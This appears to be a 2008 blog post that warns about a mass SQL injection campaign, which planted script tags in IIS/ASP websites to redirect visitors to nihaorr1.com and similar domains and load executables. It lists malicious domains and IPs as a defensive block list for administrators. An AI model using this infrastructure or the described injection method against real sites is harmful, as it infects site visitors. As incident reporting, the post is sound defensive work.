Found anything special in the following Google search results?
Yes, except the 3rd link that points to the IIS.net forum, all other destinations in the search results have been compromised. The codes between <script src= … and … </script> were planted into the contents of those websites by some kind of malicious hacking mechanism without webmasters’ awareness. Do NOT click on any of those links!!!
This thread in IIS.net forum, Anyone know about www.nihaorr1.com/1.js? tells part of the story by a few people talking about their findings. Basically, once the website is juggled, when the visitor clicks on the link that have hacking code implanted, the browser will be redirected to www.nihaorr1.com website and 1.js from that website will be executed. Most web visitors would not notice anything except something like "Page cannot be found" shown in the brower, which doesn’t mean anything harmful. But actually, the codes have already be running on their PCs. So far, I saw there were test.exe, 1.js, Yahoo.php pulled from that website to the clients. Those files are executable, if you have antivirus software installed with up-to-date antivirus definition, they will be quarantined; if you don’t have, I don’t know …
Webmasters, especially those run IIS, use ASP codes and have SQL database in the backend, check your servers, codes and databases. Thousands of websites have been compromised as shown in Google search results. There is no official information yet, but I personally quite agree to rwmorey, eftennis and davcox’s comments in http://forums.iis.net/p/1148917/1867622.aspx. I will also add some new findings in the new few days. [Apr.18]
There are 2 more domains that could contain the same malicious code: aspder.com, 414151.com. From somewhere some hackers are trying to plant the code in your web server or SQL database, so your visitor will be redirect to those sites and probably get infected.
Here is more details found in the Malware Domain Blocklist:
The IP address 60.172.219.4 contains
414151..com and a new domain, aspder..com
Source: http://www.robtex.com/ip/60.172.219.4.html
aspder..com resolves, and there are iframes popping up in google:
http://www.google.com/search?q=aspder.com
Needless to say, block this IP and domain. If anyone can download and analyze the iframe, we would appreciate more information. Thanks.
UPDATE: it’s a sql injection attack, see these links for more detail:
http://www.webhostingtalk.com/showthread.php?t=686032
http://www.webhostingtalk.com/showthread.php?p=5062187These posts also mention twww..nihaorr1..com/1.js
Also in those threads in Web Hosting Talk (two links above), there are more details about how the hackers plant the code in you web servers and SQL servers. The following is copied from that site:
Here is a link to shed light on the problem and how to mitigate it –
http://www.codeproject.com/KB/database/SqlInjectionAttacks.aspx
Many high profile sites got hit by the injection of early april and also one in early march. Sites like usatoday-dot-com, forbes-dot-com, walmart-dot-com, and on and on. Several thousand sites got hit.
Here are some more links about it –
http://myitforum.com/cs2/blogs/cmosby/archive/2008/04/04/nmidahena-sans-internet-storm-center.aspx
http://isc.sans.org/diary.html?storyid=4210
http://ddanchev.blogspot.com/2008/03/massive-iframe-seo-poisoning-attack.html
Block the following on your proxy servers, home routers and other Internet gateway device, so your user will not get infected when the website they visit is compromised. Besides the web and SQL servers, these are how you control the controllable as a server/network administrator.
IPs
60.172.219.4
24.28.193.9
219.153.46.28Domains
aspder.com
*.aspder.com
nihaorr1.com
*.nihaorr1.com
414151.com
*.414151.com
Microsoft also published a security advisory 951306, not sure if it’s relevant, need to test and prove. [Apr.19]